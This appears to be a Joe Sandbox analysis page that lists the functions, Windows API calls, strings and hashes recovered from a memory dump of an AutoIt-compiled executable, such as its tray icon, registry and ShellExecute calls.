Instruction ID: 8abedcb7c7f33cafdf9113585001de879bddd2bdf7ec9522c9cd01225bee719b
Opcode Fuzzy Hash: 7ee1ebe3578a9fc28133a2fed3c5965897f41596d7db23cbf58aaa2413f7cfa8
Instruction Fuzzy Hash: E0714671A00615DFCF14EF68D484A9EBBF0EF08314F18849AE856AB392D774ED45CBA1

Function 00D92BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 00D52B6B

Part of subcall function 00D53A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00E21418,?,00D52E7F,?,?,?,00000000), ref: 00D53A78

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00E12224), ref: 00D92C10
ShellExecuteW.SHELL32(00000000,?,?,00E12224), ref: 00D92C17

Strings

runas, xrefs: 00D92C0B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: be8746aa311cddb9dd6491285596d728337f807375f48597f50d31b139904d01
Instruction ID: 9ae20a3e24550b563274ddbf661320aa164bfe2c2ccf112f1d0f891ad759e0e2
Opcode Fuzzy Hash: be8746aa311cddb9dd6491285596d728337f807375f48597f50d31b139904d01
Instruction Fuzzy Hash: 4311A531204345AACF14FF64D8929BEBBA5DFE5342F48142DBC96560A2DF209A4EC732

Function 00D53B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B40
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B61
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00D53B0F,SwapMouseButtons,00000004,?), ref: 00D53B83

Strings

Control Panel\Mouse, xrefs: 00D53B3E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: faa889901fb45b982939dc95df2a7ef2b8029dc0160bd095cc069267f8ee2ba6
Instruction ID: 103a213d17e48d4e1fd26c8c602fffca44308e9cae263f0d6f79637a1f2b9718
Opcode Fuzzy Hash: faa889901fb45b982939dc95df2a7ef2b8029dc0160bd095cc069267f8ee2ba6
Instruction Fuzzy Hash: 381118B5520218FFDF208FA5DC84AAEB7A8EF04785B144459EC05D7210D6319E459770

Function 00D53923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D933A2

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D53A04

Strings

Line: , xrefs: 00D933EB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: c7f88e321b9ba14213d553642b347781456a9d56507ff6eb01c4c335814ab27a
Instruction ID: e73b3a40c4a7ceb96b9e537db4571c0f04f6f89f150959f2f1d400002fb9b2a8
Opcode Fuzzy Hash: c7f88e321b9ba14213d553642b347781456a9d56507ff6eb01c4c335814ab27a
Instruction Fuzzy Hash: A431CDB1408344AADB21EB24D845BEAB7D8EB50351F04496AFD9993091EB709B4DCBB2

Function 00D52DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00D92C8C

Part of subcall function 00D53AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D53A97,?,?,00D52E7F,?,?,?,00000000), ref: 00D53AC2

Part of subcall function 00D52DA5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00D52DC4

Strings

X, xrefs: 00D92C5A
`e, xrefs: 00D92C85

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e
API String ID: 779396738-4036142377
Opcode ID: 18e2b5379a5501033f2761b551b560a81d672e30bd309dcdd46e200065bd4b64
Instruction ID: eebbad8db122f4783ee7f6431d085ce0861056f1645617ddb87c63a649b44b0c
Opcode Fuzzy Hash: 18e2b5379a5501033f2761b551b560a81d672e30bd309dcdd46e200065bd4b64
Instruction Fuzzy Hash: 79218471A002989EDF01EF94C8457EE7BB9EF49315F004059E845B7241EBB4968D8B71

Function 00D6FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00D70668

Part of subcall function 00D732A4: RaiseException.KERNEL32(?,?,?,00D7068A,?,00E21444,?,?,?,?,?,?,00D7068A,00D51129,00E18738,00D51129), ref: 00D73304

__CxxThrowException@8.LIBVCRUNTIME ref: 00D70685

Strings

Unknown exception, xrefs: 00D70692

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: a02e2359308b8f26dbdd6e220fcd854465d4af24438dbe760ff90c502900ac82
Instruction ID: 2949df3a684db64f5863bf12836ce2d9a5c173c282a5c7805c4a2768cbc45478
Opcode Fuzzy Hash: a02e2359308b8f26dbdd6e220fcd854465d4af24438dbe760ff90c502900ac82
Instruction Fuzzy Hash: 35F04934900709B7CB00BAA4E856C9E7B6C9E40350B648575B92C965D2FF71EA658AB0

Function 00D510F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D51BF4
Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D51BFC
Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D51C07
Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D51C12
Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D51C1A
Part of subcall function 00D51BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D51C22

Part of subcall function 00D51B4A: RegisterWindowMessageW.USER32(00000004,?,00D512C4), ref: 00D51BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D5136A
OleInitialize.OLE32 ref: 00D51388
CloseHandle.KERNEL32(00000000,00000000), ref: 00D924AB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d735c6208439904eae0a443a0d24a64592bce1ea96c7ee8542fe50a1facd6734
Instruction ID: 6452d037f163ff5c0500c15fd269afc05e407e40a53c24a59f79952faa129853
Opcode Fuzzy Hash: d735c6208439904eae0a443a0d24a64592bce1ea96c7ee8542fe50a1facd6734
Instruction Fuzzy Hash: 1571CEB49513548EC7A8EF7BAC816543BE0FBA834135452FAD81AE7361EB30460BCF61

Function 00DBC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D53923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D53A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DBC259
KillTimer.USER32(?,00000001,?,?), ref: 00DBC261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DBC270

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 9a120a88b9b73ee63daec67b009c0d961dea43a4931b400946f465c8844a9c54
Instruction ID: 31fe3cdf87f5b5fb811ec7575d2209cff45a688f473c9bb0e1c604c4df41107b
Opcode Fuzzy Hash: 9a120a88b9b73ee63daec67b009c0d961dea43a4931b400946f465c8844a9c54
Instruction Fuzzy Hash: 9431C370914384EFEB32DF648895BE7BBECAB06308F04149ED5DAA7241C3745A89CB65

Function 00D886AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,00D885CC,?,00E18CC8,0000000C), ref: 00D88704
GetLastError.KERNEL32(?,00D885CC,?,00E18CC8,0000000C), ref: 00D8870E
__dosmaperr.LIBCMT ref: 00D88739

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 37667cb66a4122699a44e9e0195eab9e589df32c46f11adaf9d487a6c92f5145
Instruction ID: 24977514ed44cba389bb692f5ae088b289fdc2ec480d775e21386cee2ffa3260
Opcode Fuzzy Hash: 37667cb66a4122699a44e9e0195eab9e589df32c46f11adaf9d487a6c92f5145
Instruction Fuzzy Hash: 4C012636A056603AD6357334B846B7E67598B82774F7D0119F818DB1D3EEA1DC82A3B0

Function 00D61310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00D617F6

Strings

CALL, xrefs: 00D617C6

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: eb4184d55034643cd20ee946814941611937d1d73006c7a3be138d9ab00d7966
Instruction ID: 812de04ce339e54d727c8ff13ddd947a26524146386c1bb702349db9b33265b0
Opcode Fuzzy Hash: eb4184d55034643cd20ee946814941611937d1d73006c7a3be138d9ab00d7966
Instruction Fuzzy Hash: 3E224878608241DFC714DF24C490A2ABBF1FF89314F1C895DF5968B2A2D771E945CBA2

Function 00D53837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D53908

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 033b4ed371677a2de72195c0837a88de16786aef1224d9f3060bce4424bc762b
Instruction ID: 664621616f68acf8f17e935f85b9e93a9badbe9c7dac3d90804eb6dcf744a287
Opcode Fuzzy Hash: 033b4ed371677a2de72195c0837a88de16786aef1224d9f3060bce4424bc762b
Instruction Fuzzy Hash: BD31C1B06043008FDB21DF65D884797BBE8FB59349F04096EFD9A97240E771AA48CB62

Function 00D54ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D54E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E9C
Part of subcall function 00D54E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D54EAE
Part of subcall function 00D54E90: FreeLibrary.KERNEL32(00000000,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EFD

Part of subcall function 00D54E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E62
Part of subcall function 00D54E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D54E74
Part of subcall function 00D54E59: FreeLibrary.KERNEL32(00000000,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E87

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: d910499dd21c8eb550fecf6e2207e61fe6f5ab2dd3ce09ec4107adb8c81fab0e
Instruction ID: 00ecd3f08845d7e419f85afaec90f678cd1afaa4ced6883f7e69387e4ac65647
Opcode Fuzzy Hash: d910499dd21c8eb550fecf6e2207e61fe6f5ab2dd3ce09ec4107adb8c81fab0e
Instruction Fuzzy Hash: A9110132610305ABCF20BB68DC12FAD77A4EF40716F10842DFD42AA1C1EE709A899B71

Function 00D88402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00D88440

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: bf786b62cae88eafb9a49b9845fdb3cc65200ed53b5adf579086dc554a715d9e
Instruction ID: 69abb877580854b17a5a6d80f3db412d9bf08a541f6b198af3e376b60c292b2f
Opcode Fuzzy Hash: bf786b62cae88eafb9a49b9845fdb3cc65200ed53b5adf579086dc554a715d9e
Instruction Fuzzy Hash: C311487290420AAFCF15DF58E94099A7BF9EF48300F144059FC08AB312DB30DA11DBA4

Function 00D7E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: d45bcf2a29ab32ce3b73ad6ed3da7c20221066eb6985e67b197c8c477e86b5bf
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: B7F02832511A10A6C7313B698C06B5E339DDF56330F148B55F829931D2FB74D8028BB5

Function 00D83820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e0bd3288fa86173ef950f4c9ba164bf532c7d38d7a5429e05e17f1fa26decefd
Instruction ID: bf116a9ed57d66ae5681708e982176cd9f1c9e4b66e57c7404e1529022ef22b8
Opcode Fuzzy Hash: e0bd3288fa86173ef950f4c9ba164bf532c7d38d7a5429e05e17f1fa26decefd
Instruction Fuzzy Hash: BBE065312023245BD63137679C05F9A7669EF42FB0F194125BC5DA6591EB61DE0183F1

Function 00D54F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54F6D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 6620b6784f27b2156815003a3d471a1a8666ca27b7a61e6e8d879d345876e09c
Instruction ID: 91ad6a5c7c62af4d1b8590a5e35989a5d6a63aa76c9d2a4493fa2a0075a393b8
Opcode Fuzzy Hash: 6620b6784f27b2156815003a3d471a1a8666ca27b7a61e6e8d879d345876e09c
Instruction Fuzzy Hash: A6F01571109752CFDB349F68D490866BBE4AF1432A324896EE9EA86621C7319888DF21

Function 00D530F2 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000002,?), ref: 00D5314E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 78de60146fd50dca37f3f5e7cac3616528c68c6879287e13afcb094d81a38660
Instruction ID: b1bfcfb64d3529e979ee48466a88fae1fe9728bd44d82a47bdae9c763346cbd2
Opcode Fuzzy Hash: 78de60146fd50dca37f3f5e7cac3616528c68c6879287e13afcb094d81a38660
Instruction Fuzzy Hash: 98F037709143589FEB62DB24DC457D97BBCA701708F0400E9A588A6291D774578DCF55

Function 00D52DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00D52DC4

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: d9003afb05728363fb71779ef0ee2f9bcad7208f54534121467eed94d78b08f5
Instruction ID: a42db05dd4348028a679a116ec62e860bf82f766edb5160c0be475366da49145
Opcode Fuzzy Hash: d9003afb05728363fb71779ef0ee2f9bcad7208f54534121467eed94d78b08f5
Instruction Fuzzy Hash: CAE0CD776042245BCB10A6989C06FEA77DDDFC8790F040071FD09D7248E970ED848570

Function 00D52B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00D53837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00D53908

Part of subcall function 00D5D730: GetInputState.USER32 ref: 00D5D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00D52B6B

